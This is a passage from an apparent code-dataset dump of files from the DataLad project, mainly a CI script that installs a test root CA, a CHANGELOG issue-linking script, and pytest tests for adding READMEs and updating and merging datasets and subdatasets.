rmtree(delete_after_path)\n\n annex.always_commit = old_always_commit\n # remove what is left and/or everything upon failure\n earchive.clean(force=True)\n # remove tempfile directories (not cleaned up automatically):\n if prefix_dir is not None and lexists(prefix_dir):\n os.rmdir(prefix_dir)\n yield get_status_dict(\n ds=ds,\n status='ok',\n **res_kwargs)\n return annex\n" }, { "alpha_fraction": 0.7625698447227478, "alphanum_fraction": 0.7625698447227478, "avg_line_length": 38.77777862548828, "blob_id": "724b67f6df2b0026db74a40e884506341e48a954", "content_id": "4b55d2fa694b3a9da0a4673172950e2fa921e7f1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 358, "license_type": "permissive", "max_line_length": 90, "num_lines": 9, "path": "/tools/ci/deploy_datalad-rootca", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# deploy the root CA that comes with the sources in order to be able to test\n# against the internal HTTPS server without fiddling\n\nif hash update-ca-certificates; then\n sudo mkdir -p /usr/local/share/ca-certificates/\n sudo cp datalad/tests/ca/ca-root.pem /usr/local/share/ca-certificates/datalad-root.crt\n sudo update-ca-certificates\nfi\n" }, { "alpha_fraction": 0.5781659483909607, "alphanum_fraction": 0.5882096290588379, "avg_line_length": 24.44444465637207, "blob_id": "95e9e2af2c10bfc5eee62f89e14e86511a795303", "content_id": "c40d77cc7844ffdb5caa3067898fcc7178ee2b5f", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2290, "license_type": "permissive", "max_line_length": 137, "num_lines": 90, "path": "/datalad/local/tests/test_add_readme.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test add_readme\"\"\"\n\n\nfrom os.path import join as opj\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_repo_status,\n assert_status,\n known_failure_githubci_win,\n ok_startswith,\n with_tree,\n)\n\n_ds_template = {\n '.datalad': {\n 'config': '''\\\n[datalad \"metadata\"]\n nativetype = frictionless_datapackage\n'''},\n 'datapackage.json': '''\\\n{\n \"title\": \"demo_ds\",\n \"description\": \"this is for play\",\n \"license\": \"PDDL\",\n \"author\": [\n \"Betty\",\n \"Tom\"\n ]\n}\n'''}\n\n\n@known_failure_githubci_win # fails since upgrade to 8.20200226-g2d3ef2c07\n@with_tree(_ds_template)\ndef test_add_readme(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n if False:\n # TODO make conditional on the presence of datalad-deprecated\n ds.aggregate_metadata()\n assert_repo_status(ds.path)\n assert_status('ok', ds.add_readme())\n # should use default name\n content = open(opj(path, 'README.md')).read()\n if False:\n # TODO make conditional on the presence of datalad-deprecated\n ok_startswith(\n content,\n \"\"\"\\\n# Dataset \"demo_ds\"\n\nthis is for play\n\n### Authors\n\n- Betty\n- Tom\n\n### License\n\nPDDL\n\n## General information\n\nThis is a DataLad dataset (id: {id}).\n\"\"\".format(\n id=ds.id))\n # make sure that central README references are present\n assert_in(\n \"\"\"More information on how to install DataLad and [how to install](http://handbook.datalad.org/en/latest/intro/installation.html)\nit can be found in the [DataLad Handbook](https://handbook.datalad.org/en/latest/index.html).\n\"\"\",\n content\n )\n # no unexpectedly long lines\n assert all([len(l) < 160 for l in content.splitlines()])\n\n # should skip on re-run\n assert_status('notneeded', ds.add_readme())\n" }, { "alpha_fraction": 0.5033556818962097, "alphanum_fraction": 0.5167785286903381, "avg_line_length": 28.799999237060547, "blob_id": "6187d925094901b60f42dda5ed80582933f6f29b", "content_id": "1cbf72de9c19b20eade75e62c16829658d0e72a5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 447, "license_type": "permissive", "max_line_length": 101, "num_lines": 15, "path": "/tools/link_issues_CHANGELOG", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nin=CHANGELOG.md\n\n# Replace them with Markdown references\nsed -i -e 's/(\\(#[0-9]\\+\\))/([\\1][])/g' \"$in\"\n\n# Populate references\ntr ' ,' '\\n\\n' < \"$in\" | sponge | sed -n -e 's/.*(\\[#\\([0-9]\\+\\)\\]\\(\\[\\]*\\)).*/\\1/gp' | sort | uniq \\\n| while read issue; do\n #echo \"issue $issue\"\n # remove old one if exists\n sed -i -e \"/^\\[#$issue\\]:.*/d\" \"$in\"\n echo \"[#$issue]: https://github.com/datalad/datalad/issues/$issue\" >> \"$in\";\ndone\n" }, { "alpha_fraction": 0.627322256565094, "alphanum_fraction": 0.6347535848617554, "avg_line_length": 39.05793380737305, "blob_id": "dff79d65236a05580205ad333f6a06f5592fed6e", "content_id": "befcd40778ce8241e17d1fdd663d140ac43a7601", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 44945, "license_type": "permissive", "max_line_length": 96, "num_lines": 1122, "path": "/datalad/distribution/tests/test_update.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test update action\n\n\"\"\"\n\nimport os\nimport os.path as op\nfrom os.path import exists\nfrom os.path import join as opj\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.api import (\n clone,\n install,\n remove,\n update,\n)\nfrom datalad.distribution.update import _process_how_args\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n SkipTest,\n assert_false,\n assert_in,\n assert_in_results,\n assert_is_instance,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n create_tree,\n eq_,\n known_failure_windows,\n maybe_adjust_repo,\n neq_,\n ok_,\n ok_file_has_content,\n skip_if_adjusted_branch,\n slow,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n knows_annex,\n rmtree,\n)\n\nfrom ..dataset import Dataset\n\n\n@slow\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_update_simple(origin=None, src_path=None, dst_path=None):\n ca = dict(result_renderer='disabled')\n # a remote dataset with a subdataset underneath\n origds = Dataset(origin).create(**ca)\n # naming is weird, but a legacy artifact\n _ = origds.create('subm 1', **ca)\n _ = origds.create('2', **ca)\n\n # prepare src\n source = install(src_path, source=origin, recursive=True)\n # forget we cloned it by removing remote, which should lead to\n # setting tracking branch to target:\n source.repo.remove_remote(DEFAULT_REMOTE)\n # also forget the declared absolute location of the submodules, and turn them\n # relative to this/a clone\n for sub in source.subdatasets(result_xfm=lambda x: x['gitmodule_name']):\n source.subdatasets(path=sub, set_property=[('url', './{}'.format(sub))])\n\n # dataset without sibling will not need updates\n assert_status('notneeded', source.update())\n # deprecation message doesn't ruin things\n assert_status('notneeded', source.update(fetch_all=True))\n # but error if unknown sibling is given\n assert_status('impossible', source.update(sibling='funky', on_failure='ignore'))\n\n # get a clone to update later on:\n dest = install(dst_path, source=src_path, recursive=True)\n # test setup done;\n # assert all fine\n assert_repo_status(dst_path)\n assert_repo_status(src_path)\n\n # update yields nothing => up-to-date\n assert_status('ok', dest.update())\n assert_repo_status(dst_path)\n\n # modify remote:\n with open(opj(src_path, \"update.txt\"), \"w\") as f:\n f.write(\"Additional content\")\n source.save(path=\"update.txt\", message=\"Added update.txt\")\n assert_repo_status(src_path)\n\n # update without `merge` only fetches:\n assert_status('ok', dest.update())\n # modification is not known to active branch:\n assert_not_in(\"update.txt\",\n dest.repo.get_files(dest.repo.get_active_branch()))\n # modification is known to branch <default remote>/<default branch>\n assert_in(\"update.txt\",\n dest.repo.get_files(DEFAULT_REMOTE + \"/\" + DEFAULT_BRANCH))\n\n # merge:\n assert_status('ok', dest.update(merge=True))\n # modification is now known to active branch:\n assert_in(\"update.txt\",\n dest.repo.get_files(dest.repo.get_active_branch()))\n # it's known to annex, but has no content yet:\n annexprops = dest.repo.get_file_annexinfo(\"update.txt\",\n eval_availability=True)\n annexprops['key'] # blows if unknown\n eq_(False, annexprops['has_content'])\n\n # check subdataset path constraints, baseline (parent + 2 subds)\n assert_result_count(dest.update(recursive=True),\n 3, status='ok', type='dataset')\n # no recursion and invalid path still updates the parent\n res = dest.update(path='whatever')\n assert_result_count(res, 1, status='ok', type='dataset')\n assert_result_count(res, 1, status='ok', path=dest.path)\n # invalid path with recursion also does\n res = dest.update(recursive=True, path='whatever')\n assert_result_count(res, 1, status='ok', type='dataset')\n assert_result_count(res, 1, status='ok', path=dest.path)\n # valid path and no recursion only updates the parent\n res = dest.update(path='subm 1')\n assert_result_count(res, 1, status='ok', type='dataset')\n assert_result_count(res, 1, status='ok', path=dest.path)\n # valid path and recursion updates matching\n res = dest.update(recursive=True, path='subm 1')\n assert_result_count(res, 2, status='ok', type='dataset')\n assert_result_count(res, 1, status='ok', path=dest.path)\n assert_result_count(res, 1, status='ok', path=str(dest.pathobj / 'subm 1'))\n # additional invalid path doesn't hurt\n res = dest.update(recursive=True, path=['subm 1', 'mike'])\n assert_result_count(res, 2, status='ok', type='dataset')\n # full match\n res = dest.update(recursive=True, path=['subm 1', '2'])\n assert_result_count(res, 3, status='ok', type='dataset')\n\n # test that update doesn't crash if we specify only a single path (submod) to\n # operate on\n with chpwd(dest.path):\n # in 0.11.x it would be a single result since \"pwd\" dataset is not\n # considered, and would be relative path (as specified).\n # In 0.12.0 - it would include implicit pwd dataset, and paths would be absolute\n res_update = update(path=['subm 1'], recursive=True)\n assert_result_count(res_update, 2)\n for p in dest.path, str(dest.pathobj / 'subm 1'):\n assert_in_results(res_update, path=p, action='update', status='ok', type='dataset')\n\n # and with merge we would also try to save (but there would be no changes)\n res_merge = update(path=['subm 1'], recursive=True, merge=True)\n assert_result_count(res_merge, 2, action='update')\n # 2 of \"updates\" really.\n assert_in_results(res_merge, action='update', status='ok', type='dataset')\n assert_in_results(res_merge, action='save', status='notneeded', type='dataset')\n\n # smoke-test if recursive update doesn't fail if submodule is removed\n # and that we can run it from within a dataset without providing it\n # explicitly\n assert_result_count(\n dest.remove('subm 1'), 1,\n status='ok', action='remove', path=opj(dest.path, 'subm 1'))\n with chpwd(dest.path):\n assert_result_count(\n update(recursive=True), 2,\n status='ok', type='dataset')\n assert_result_count(\n dest.update(merge=True, recursive=True), 2,\n action='update', status='ok', type='dataset')\n\n # and now test recursive update with merging in differences\n create_tree(opj(source.path, '2'), {'load.dat': 'heavy'})\n source.save(opj('2', 'load.dat'),\n message=\"saving changes within subm2\",\n recursive=True)\n assert_result_count(\n dest.update(merge=True, recursive=True), 2,\n action='update', status='ok', type='dataset')\n # and now we can get new file\n dest.get(opj('2', 'load.dat'))\n ok_file_has_content(opj(dest.path, '2', 'load.dat'), 'heavy')\n\n\n@with_tempfile\n@with_tempfile\ndef test_update_git_smoke(src_path=None, dst_path=None):\n # Apparently was just failing on git repos for basic lack of coverage, hence this quick test\n ds = Dataset(src_path).create(annex=False)\n target = install(\n dst_path, source=src_path,\n result_xfm='datasets', return_type='item-or-list')\n create_tree(ds.path, {'file.dat': '123'})\n ds.save('file.dat')\n assert_result_count(\n target.update(recursive=True, merge=True), 1,\n action='update', status='ok', type='dataset')\n ok_file_has_content(opj(target.path, 'file.dat'), '123')\n\n\n@slow # ~9s\n@with_tempfile(mkdir=True)\ndef test_update_fetch_all(path=None):\n path = Path(path)\n remote_1 = str(path / \"remote_1\")\n remote_2 = str(path / \"remote_2\")\n\n ds = Dataset(path / \"src\").create()\n src = ds.repo.path\n\n ds_rmt1 = clone(source=src, path=remote_1)\n ds_rmt2 = clone(source=src, path=remote_2)\n\n ds.siblings('add', name=\"sibling_1\", url=remote_1)\n ds.siblings('add', name=\"sibling_2\", url=remote_2)\n\n # modify the remotes:\n (ds_rmt1.pathobj / \"first.txt\").write_text(\"some file load\")\n ds_rmt1.save()\n\n # TODO: Modify an already present file!\n\n (ds_rmt2.pathobj / \"second.txt\").write_text(\"different file load\")\n ds_rmt2.save()\n\n # Let's init some special remote which we couldn't really update/fetch\n if not dl_cfg.get('datalad.tests.dataladremote'):\n ds.repo.init_remote(\n 'datalad',\n ['encryption=none', 'type=external', 'externaltype=datalad'])\n # fetch all remotes\n assert_result_count(\n ds.update(), 1, status='ok', type='dataset')\n\n # no merge, so changes are not in active branch:\n assert_not_in(\"first.txt\",\n ds.repo.get_files(ds.repo.get_active_branch()))\n assert_not_in(\"second.txt\",\n ds.repo.get_files(ds.repo.get_active_branch()))\n # but we know the changes in remote branches:\n assert_in(\"first.txt\", ds.repo.get_files(\"sibling_1/\" + DEFAULT_BRANCH))\n assert_in(\"second.txt\", ds.repo.get_files(\"sibling_2/\" + DEFAULT_BRANCH))\n\n # no merge strategy for multiple remotes yet:\n # more clever now, there is a tracking branch that provides a remote\n #assert_raises(NotImplementedError, ds.update, merge=True)\n\n # merge a certain remote:\n assert_result_count(\n ds.update(sibling='sibling_1', merge=True),\n 1, action='update', status='ok', type='dataset')\n\n # changes from sibling_2 still not present:\n assert_not_in(\"second.txt\",\n ds.repo.get_files(ds.repo.get_active_branch()))\n # changes from sibling_1 merged:\n assert_in(\"first.txt\",\n ds.repo.get_files(ds.repo.get_active_branch()))\n # it's known to annex, but has no content yet:\n annexprops = ds.repo.get_file_annexinfo(\n \"first.txt\", eval_availability=True)\n annexprops['key'] # blows if unknown\n eq_(False, annexprops['has_content'])\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_newthings_coming_down(originpath=None, destpath=None):\n origin = GitRepo(originpath, create=True)\n create_tree(originpath, {'load.dat': 'heavy'})\n Dataset(originpath).save('load.dat')\n ds = install(\n source=originpath, path=destpath,\n result_xfm='datasets', return_type='item-or-list')\n assert_is_instance(ds.repo, GitRepo)\n assert_in(DEFAULT_REMOTE, ds.repo.get_remotes())\n # turn origin into an annex\n origin = AnnexRepo(originpath, create=True)\n # clone doesn't know yet\n assert_false(knows_annex(ds.path))\n # but after an update it should\n # no merge, only one sibling, no parameters should be specific enough\n assert_result_count(ds.update(), 1, status='ok', type='dataset')\n assert(knows_annex(ds.path))\n # no branches appeared\n eq_(ds.repo.get_branches(), [DEFAULT_BRANCH])\n # now merge, and get an annex\n assert_result_count(ds.update(merge=True),\n 1, action='update', status='ok', type='dataset')\n assert_in('git-annex', ds.repo.get_branches())\n assert_is_instance(ds.repo, AnnexRepo)\n # should be fully functional\n testfname = opj(ds.path, 'load.dat')\n assert_false(ds.repo.file_has_content(testfname))\n ds.get('.')\n ok_file_has_content(opj(ds.path, 'load.dat'), 'heavy')\n # check that a new tag comes down\n origin.tag('first!')\n assert_result_count(ds.update(), 1, status='ok', type='dataset')\n eq_(ds.repo.get_tags(output='name')[0], 'first!')\n\n # and now we destroy the remote annex\n origin.call_git(['config', '--remove-section', 'annex'])\n rmtree(opj(origin.path, '.git', 'annex'), chmod_files=True)\n origin.call_git(['branch', '-D', 'git-annex'])\n origin = GitRepo(originpath)\n assert_false(knows_annex(originpath))\n\n # and update the local clone\n # for now this should simply not fail (see gh-793), later might be enhanced to a\n # graceful downgrade\n before_branches = ds.repo.get_branches()\n ok_(any(\"git-annex\" in b\n for b in ds.repo.get_remote_branches()))\n assert_result_count(ds.update(), 1, status='ok', type='dataset')\n eq_(before_branches, ds.repo.get_branches())\n # annex branch got pruned\n assert_false(any(\"git-annex\" in b\n for b in ds.repo.get_remote_branches()))\n # check that a new tag comes down even if repo types mismatch\n origin.tag('second!')\n assert_result_count(ds.update(), 1, status='ok', type='dataset')\n eq_(ds.repo.get_tags(output='name')[-1], 'second!')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_update_volatile_subds(originpath=None, otherpath=None, destpath=None):\n origin = Dataset(originpath).create()\n repo = origin.repo\n if repo.is_managed_branch() and repo.git_annex_version <= \"8.20201129\":\n # Fails before git-annex's fd161da2c (adjustTree: Consider submodule\n # deletions, 2021-01-06).\n raise SkipTest(\n \"On adjusted branch, test requires fix in more recent git-annex\")\n ds = install(\n source=originpath, path=destpath,\n result_xfm='datasets', return_type='item-or-list')\n # as a submodule\n sname = 'subm 1'\n osm1 = origin.create(sname)\n assert_result_count(ds.update(), 1, status='ok', type='dataset')\n # nothing without a merge, no inappropriate magic\n assert_not_in(sname, ds.subdatasets(result_xfm='relpaths'))\n assert_result_count(ds.update(merge=True),\n 1, action='update', status='ok', type='dataset')\n # and we should be able to do update with recursive invocation\n assert_result_count(ds.update(merge=True, recursive=True),\n 1, action='update', status='ok', type='dataset')\n # known, and placeholder exists\n assert_in(sname, ds.subdatasets(result_xfm='relpaths'))\n ok_(exists(opj(ds.path, sname)))\n\n # remove from origin\n origin.remove(sname, reckless='availability')\n assert_result_count(ds.update(merge=True),\n 1, action='update', status='ok', type='dataset')\n # gone locally, wasn't checked out\n assert_not_in(sname, ds.subdatasets(result_xfm='relpaths'))\n assert_false(exists(opj(ds.path, sname)))\n\n # re-introduce at origin\n osm1 = origin.create(sname)\n create_tree(osm1.path, {'load.dat': 'heavy'})\n origin.save(opj(osm1.path, 'load.dat'))\n assert_result_count(ds.update(merge=True),\n 1, action='update', status='ok', type='dataset')\n # grab new content of uninstall subdataset, right away\n ds.get(opj(ds.path, sname, 'load.dat'))\n ok_file_has_content(opj(ds.path, sname, 'load.dat'), 'heavy')\n\n # modify ds and subds at origin\n create_tree(origin.path, {'mike': 'this', sname: {'probe': 'little'}})\n origin.save(recursive=True)\n assert_repo_status(origin.path)\n\n # updates for both datasets should come down the pipe\n assert_result_count(ds.update(merge=True, recursive=True),\n 2, action='update', status='ok', type='dataset')\n assert_repo_status(ds.path)\n\n # now remove just-installed subdataset from origin again\n origin.remove(sname, reckless='kill')\n assert_not_in(sname, origin.subdatasets(result_xfm='relpaths'))\n assert_in(sname, ds.subdatasets(result_xfm='relpaths'))\n # merge should disconnect the installed subdataset, but leave the actual\n # ex-subdataset alone\n assert_result_count(ds.update(merge=True, recursive=True),\n 1, action='update', type='dataset')\n assert_not_in(sname, ds.subdatasets(result_xfm='relpaths'))\n ok_file_has_content(opj(ds.path, sname, 'load.dat'), 'heavy')\n ok_(Dataset(opj(ds.path, sname)).is_installed())\n\n # now remove the now disconnected subdataset for further tests\n remove(dataset=op.join(ds.path, sname), reckless='kill')\n assert_repo_status(ds.path)\n\n # new separate subdataset, not within the origin dataset\n otherds = Dataset(otherpath).create()\n # install separate dataset as a submodule\n ds.install(source=otherds.path, path='other')\n create_tree(otherds.path, {'brand': 'new'})\n otherds.save()\n assert_repo_status(otherds.path)\n # pull in changes\n res = ds.update(merge=True, recursive=True)\n assert_result_count(\n res, 2, status='ok', action='update', type='dataset')\n # the next is to check for #2858\n assert_repo_status(ds.path)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_reobtain_data(originpath=None, destpath=None):\n origin = Dataset(originpath).create()\n ds = install(\n source=originpath, path=destpath,\n result_xfm='datasets', return_type='item-or-list')\n # no harm\n assert_result_count(ds.update(merge=True, reobtain_data=True),\n 1, action=\"update\", status=\"ok\")\n # content\n create_tree(origin.path, {'load.dat': 'heavy'})\n origin.save(opj(origin.path, 'load.dat'))\n # update does not bring data automatically\n assert_result_count(ds.update(merge=True, reobtain_data=True),\n 1, action=\"update\", status=\"ok\")\n assert_in('load.dat', ds.repo.get_annexed_files())\n assert_false(ds.repo.file_has_content('load.dat'))\n # now get data\n ds.get('load.dat')\n ok_file_has_content(opj(ds.path, 'load.dat'), 'heavy')\n # new content at origin\n create_tree(origin.path, {'novel': 'but boring'})\n origin.save()\n # update must not bring in data for new file\n result = ds.update(merge=True, reobtain_data=True)\n assert_in_results(result, action='get', status='notneeded')\n\n ok_file_has_content(opj(ds.path, 'load.dat'), 'heavy')\n assert_in('novel', ds.repo.get_annexed_files())\n assert_false(ds.repo.file_has_content('novel'))\n # modify content at origin\n os.remove(opj(origin.path, 'load.dat'))\n create_tree(origin.path, {'load.dat': 'light'})\n origin.save()\n # update must update file with existing data, but leave empty one alone\n res = ds.update(merge=True, reobtain_data=True)\n assert_result_count(res, 1, status='ok', type='dataset', action='update')\n assert_result_count(res, 1, status='ok', type='file', action='get')\n ok_file_has_content(opj(ds.path, 'load.dat'), 'light')\n assert_false(ds.repo.file_has_content('novel'))\n\n\n@with_tempfile(mkdir=True)\ndef test_multiway_merge(path=None):\n # prepare ds with two siblings, but no tracking branch\n ds = Dataset(op.join(path, 'ds_orig')).create()\n r1 = AnnexRepo(path=op.join(path, 'ds_r1'), git_opts={'bare': True})\n r2 = GitRepo(path=op.join(path, 'ds_r2'), git_opts={'bare': True})\n ds.siblings(action='add', name='r1', url=r1.path)\n ds.siblings(action='add', name='r2', url=r2.path)\n assert_status('ok', ds.push(to='r1'))\n # push unlike publish reports on r2 not being an annex remote with a\n # 'notneeded'\n assert_status(('ok', 'notneeded'), ds.push(to='r2'))\n # just a fetch should be no issue\n assert_status('ok', ds.update())\n # ATM we do not support multi-way merges\n assert_status('impossible', ds.update(merge=True, on_failure='ignore'))\n\n\ndef test_unrelated_history_merge(tmp_path):\n # prepare two independent datasets and try merging one into another\n ds = Dataset(tmp_path / 'ds').create()\n repo = AnnexRepo(tmp_path / 'repo')\n f = (tmp_path / 'repo' / 'file.dat')\n f.write_text(\"data\")\n repo.add(str(f))\n repo.commit()\n # ATM we do not do any checks and allow such addition\n assert_status('ok', ds.siblings(action='add', name='repo', url=repo.path))\n res = ds.update(how='merge', on_failure='ignore')\n # ATM we do not have any special handling, just that the first result record\n # would have that error in \"message\" field\n assert_status('error', res[0])\n assert_in('refusing to merge unrelated histories', res[0]['message'])\n\n\n# `git annex sync REMOTE` rather than `git merge TARGET` is used on an\n# adjusted branch, so we don't give an error if TARGET can't be\n# determined.\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_merge_no_merge_target(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n assert_repo_status(ds_src.path)\n ds_clone.repo.checkout(DEFAULT_BRANCH, options=[\"-bnew\"])\n res = ds_clone.update(merge=True, on_failure=\"ignore\")\n assert_in_results(res, status=\"impossible\", action=\"update\")\n\n\n# `git annex sync REMOTE` is used on an adjusted branch, but this error\n# depends on `git merge TARGET` being used.\n@skip_if_adjusted_branch\n@slow # 17sec on Yarik's laptop\n@with_tempfile(mkdir=True)\ndef test_merge_conflict(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"src\").create()\n ds_src_s0 = ds_src.create(\"s0\")\n ds_src_s1 = ds_src.create(\"s1\")\n ds_src.save()\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_clone_s0 = Dataset(path / \"clone\" / \"s0\")\n ds_clone_s1 = Dataset(path / \"clone\" / \"s1\")\n\n (ds_src.pathobj / \"foo\").write_text(\"src content\")\n ds_src.save(to_git=True)\n\n (ds_clone.pathobj / \"foo\").write_text(\"clone content\")\n ds_clone.save(to_git=True)\n\n # Top-level merge failure\n res = ds_clone.update(merge=True, on_failure=\"ignore\")\n assert_in_results(res, action=\"merge\", status=\"error\")\n assert_in_results(res, action=\"update\", status=\"error\")\n # Deal with the conflicts. Note that save() won't handle this gracefully\n # because it will try to commit with a pathspec, which git doesn't allow\n # during a merge.\n ds_clone.repo.call_git([\"checkout\", \"--theirs\", \"--\", \"foo\"])\n ds_clone.repo.call_git([\"add\", \"--\", \"foo\"])\n ds_clone.repo.call_git([\"commit\", \"--no-edit\"])\n assert_repo_status(ds_clone.path)\n\n # Top-level and subdataset merge failure\n (ds_src_s0.pathobj / \"foo\").write_text(\"src s0 content\")\n (ds_src_s1.pathobj / \"foo\").write_text(\"no conflict\")\n ds_src.save(recursive=True, to_git=True)\n\n (ds_clone_s0.pathobj / \"foo\").write_text(\"clone s0 content\")\n ds_clone.save(recursive=True, to_git=True)\n res = ds_clone.update(merge=True, recursive=True, on_failure=\"ignore\")\n assert_result_count(res, 2, action=\"merge\", status=\"error\")\n assert_result_count(res, 2, action=\"update\", status=\"error\")\n assert_in_results(res, action=\"merge\", status=\"ok\",\n path=ds_clone_s1.path)\n assert_in_results(res, action=\"update\", status=\"ok\",\n path=ds_clone_s1.path)\n # No saving happens if there's a top-level conflict.\n assert_repo_status(ds_clone.path,\n modified=[ds_clone_s0.path, ds_clone_s1.path])\n\n\n# `git annex sync REMOTE` is used on an adjusted branch, but this error\n# depends on `git merge TARGET` being used.\n@skip_if_adjusted_branch\n@slow # 13sec on Yarik's laptop\n@with_tempfile(mkdir=True)\ndef test_merge_conflict_in_subdataset_only(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"src\").create()\n ds_src_sub_conflict = ds_src.create(\"sub_conflict\")\n ds_src_sub_noconflict = ds_src.create(\"sub_noconflict\")\n ds_src.save()\n\n # Set up a scenario where one subdataset has a conflict between the remote\n # and local version, but the parent dataset does not have a conflict\n # because it hasn't recorded the subdataset state.\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_clone_sub_conflict = Dataset(path / \"clone\" / \"sub_conflict\")\n ds_clone_sub_noconflict = Dataset(path / \"clone\" / \"sub_noconflict\")\n\n (ds_src_sub_conflict.pathobj / \"foo\").write_text(\"src content\")\n ds_src_sub_conflict.save(to_git=True)\n\n (ds_clone_sub_conflict.pathobj / \"foo\").write_text(\"clone content\")\n ds_clone_sub_conflict.save(to_git=True)\n\n (ds_src_sub_noconflict.pathobj / \"foo\").write_text(\"src content\")\n ds_src_sub_noconflict.save()\n\n res = ds_clone.update(merge=True, recursive=True, on_failure=\"ignore\")\n assert_in_results(res, action=\"merge\", status=\"error\",\n path=ds_clone_sub_conflict.path)\n assert_in_results(res, action=\"merge\", status=\"ok\",\n path=ds_clone_sub_noconflict.path)\n assert_in_results(res, action=\"save\", status=\"ok\",\n path=ds_clone.path)\n # We saved the subdataset without a conflict...\n assert_repo_status(ds_clone_sub_noconflict.path)\n # ... but the one with the conflict leaves it for the caller to handle.\n ok_(ds_clone_sub_conflict.repo.call_git(\n [\"ls-files\", \"--unmerged\", \"--\", \"foo\"], read_only=True).strip())\n\n\n# `git annex sync REMOTE` is used on an adjusted branch, but this error\n# depends on `git merge --ff-only ...` being used.\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_merge_ff_only(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"src\").create()\n ds_clone_ff = install(source=ds_src.path, path=path / \"clone_ff\",\n result_xfm=\"datasets\")\n\n ds_clone_nonff = install(source=ds_src.path, path=path / \"clone_nonff\",\n result_xfm=\"datasets\")\n\n (ds_clone_nonff.pathobj / \"foo\").write_text(\"local change\")\n ds_clone_nonff.save(recursive=True)\n\n (ds_src.pathobj / \"bar\").write_text(\"remote change\")\n ds_src.save(recursive=True)\n\n assert_in_results(\n ds_clone_ff.update(merge=\"ff-only\", on_failure=\"ignore\"),\n action=\"merge\", status=\"ok\")\n\n # ff-only prevents a non-fast-forward ...\n assert_in_results(\n ds_clone_nonff.update(merge=\"ff-only\", on_failure=\"ignore\"),\n action=\"merge\", status=\"error\")\n # ... that would work with \"any\".\n assert_in_results(\n ds_clone_nonff.update(merge=\"any\", on_failure=\"ignore\"),\n action=\"merge\", status=\"ok\")\n\n\n@slow # 11sec on Yarik's laptop\n@with_tempfile(mkdir=True)\ndef test_merge_follow_parentds_subdataset_other_branch(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n on_adjusted = ds_src.repo.is_managed_branch()\n ds_src_subds = ds_src.create(\"subds\")\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_clone_subds = Dataset(ds_clone.pathobj / \"subds\")\n\n ds_src_subds.repo.call_git([\"checkout\", \"-b\", \"other\"])\n (ds_src_subds.pathobj / \"foo\").write_text(\"foo content\")\n ds_src.save(recursive=True)\n assert_repo_status(ds_src.path)\n\n res = ds_clone.update(merge=True, follow=\"parentds\", recursive=True,\n on_failure=\"ignore\")\n if on_adjusted:\n # Our git-annex sync based on approach on adjusted branches is\n # incompatible with follow='parentds'.\n assert_in_results(res, action=\"update\", status=\"impossible\")\n return\n else:\n assert_in_results(res, action=\"update\", status=\"ok\")\n eq_(ds_clone.repo.get_hexsha(), ds_src.repo.get_hexsha())\n ok_(ds_clone_subds.repo.is_under_annex(\"foo\"))\n\n (ds_src_subds.pathobj / \"bar\").write_text(\"bar content\")\n ds_src.save(recursive=True)\n ds_clone_subds.repo.checkout(DEFAULT_BRANCH, options=[\"-bnew\"])\n ds_clone.update(merge=True, follow=\"parentds\", recursive=True)\n if not on_adjusted:\n eq_(ds_clone.repo.get_hexsha(), 